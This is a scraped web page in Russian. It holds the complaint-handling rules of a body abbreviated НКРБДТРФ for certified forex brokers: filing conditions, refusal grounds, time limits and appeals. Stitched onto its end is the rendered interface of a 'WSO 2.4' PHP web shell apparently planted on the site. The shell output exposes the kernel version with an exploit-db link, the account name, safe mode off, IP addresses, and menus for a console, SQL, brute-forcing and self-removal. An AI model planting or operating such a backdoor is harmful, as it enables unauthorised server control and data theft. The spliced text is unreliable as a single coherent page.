РЕГЛАМЕНТ рассмотрения претензий к организациям, сертифицированным НКРБДТРФ

Высшим органом НП НКРБДТРФ является Совет членов НКРБДТРФ, в компетенцию которого входит экспертная оценка спорной ситуации, возникшей между двумя или более участниками финансовых рынков, и последующее её урегулирование. Совет НКРБДТРФ принимает все решения, связанные с правомерностью действий брокеров.

Порядок подачи претензии:

  • Претензии к компаниям, не имеющим сертификата соответствия НКРБДТРФ, не подлежат рассмотрению Советом НКРБДТРФ.
  • Претензия клиента к компании, сертифицированной НКРБДТРФ, принимается только в том случае, если клиент получил официальный ответ от организации, не удовлетворяющий его требований, либо компания не отвечает на запросы клиента более 7 рабочих дней.
  • Рассмотрение претензии инициируется с момента получения полного пакета документов, запрошенных специалистами Центра.
  • Арбитражный комитет Центра вправе отказать в рассмотрении претензии в случаях:
    • Отказа в предоставлении всех необходимых для рассмотрения претензии материалов и содействия со стороны заявителя
    • Предоставления материалов по претензии спустя 3 календарных дней, после их запроса специалистами Центра
    • Оглашение деталей рассмотрения претензий и решений Арбитражного комитета Центра на внешних ресурсах.
  • Информация о рассмотренных претензиях, их наличии и количестве, является конфиденциальной и не предоставляется третьим лицам.
  • Заявку на рассмотрение Советом НКРБДТРФ можно подать с помощью специальной формы.

Сроки рассмотрения жалоб:

  • К рассмотрению принимаются те заявки по спорным ситуациям с компаниями, срок давности которых не превышает 1 месяца с момента возникновения данной ситуации.
  • После того как претензия клиента зафиксирована, специалисты НКРБДТРФ связываются с компанией и с заявителем, чтобы выяснить обстоятельства спорной ситуации. Этап уточнения сути претензии и последующего принятия окончательного решения занимает, как правило, до 7 рабочих дней. Принятие решения может быть отсрочено в зависимости от обстоятельств данной ситуации:
    • Минимальный срок рассмотрения претензии – 7 рабочих дней.
    • Максимальный срок рассмотрения претензии – 1 месяц. Срок рассмотрения может быть увеличен ввиду новых обстоятельств и материалов, предоставленных со стороны заявителя, либо компании.
  • Клиент или компания могут подать повторную заявку на пересмотр решения Советом НКРБДТРФ в течение 3 рабочих дней после принятия первоначального решения только в том случае, если выяснились новые факты и материалы относительно претензионной ситуации. Повторное решение Совета НКРБДТРФ после пересмотра конфликтного момента является окончательным.
xn--90agqlqcnr.xn--p1ai - WSO 2.4
Uname:
User:
Php:
Hdd:
Cwd:
Linux s12.default-host.net 3.10.0-714.10.2.lve1.5.17.1.el7.x86_64 #1 SMP Tue May 22 10:39:25 EDT 2018 x86_64 [exploit-db.com]
1258 ( forexr ) Group: 1260 ( forexr )
5.6.40 Safe mode: OFF [ phpinfo ] Datetime: 2019-08-25 22:09:00
1 B Free: B (0%)
u--------- [ home ]

Server IP:
127.0.0.1
Client IP:
34.204.179.0
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Execute:
Upload file: (Not writable)